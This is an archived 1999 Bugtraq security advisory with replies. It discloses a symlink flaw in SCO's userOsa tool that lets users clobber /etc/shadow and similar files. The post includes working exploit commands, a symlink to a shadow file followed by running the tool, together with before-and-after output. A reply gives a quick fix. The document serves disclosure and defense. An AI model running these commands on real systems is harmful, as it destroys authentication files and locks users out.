To: BUG...@SECURITYFOCUS.COM
Status: RO
Greetings,
Any user may overwrite any file with group auth (i.e. /etc/shadow,
/etc/passwd) using /etc/sysadm.d/bin/userOsa. Note that this will not
change the permissions of the file or allow for the user to input a
passwd entry string into these files, it will simply clobber the contents
of the file with debug output.
When userOsa recieves invalid input, it generates a log file called
"debug.log" in the PWD. This file is created with group auth
permissions,does not check for this file's existence, and will follow
symlinks. Thus the exploit is as follows:
scohack:/tmp$ ln -s /etc/shadow.old debug.log
scohack:/tmp$ /etc/sysadm.d/bin/userOsa
bah
connectFail {{SCO_LOCAL_PIPE_ERR_INVALID_CONNECT_REQ {Invalid Connect
Request: bah}}}
Failed to listen to client
Failure in making connection to OSA.
scohack:/tmp$
-----
BEFORE EXPLOIT:
scohack:/# l /etc/shadow.old
-rw-rw---- 1 root auth 26 Oct 11 20:08 /etc/shadow.old
AFTER EXPLOIT (note the file size):
scohack:/# l /etc/shadow.old
-rw-rw---- 1 root auth 177 Oct 11 20:10 /etc/shadow.old
scohack:/# cat /etc/shadow.old
>>> Debug log opened at Mon Oct 11 03:10:04 PM CDT 1999 by <PID=11604>
<<<
SendConnectFail(connectFail {{SCO_LOCAL_PIPE_ERR_INVALID_CONNECT_REQ
{Invalid Connect Request: bah}}})
scohack:/#
Brock Tellier
UNIX Systems Administrator
--
Danny Aldham Providing Certified Internetworking Solutions to Business
www.postino.com E-Mail, Web Servers, Mail Lists, Web Databases, SQL & Perl
My quick fix for this is to edit userOsa and replace the string
"debug.log" with "/dev/null".
--
John W. Temples, III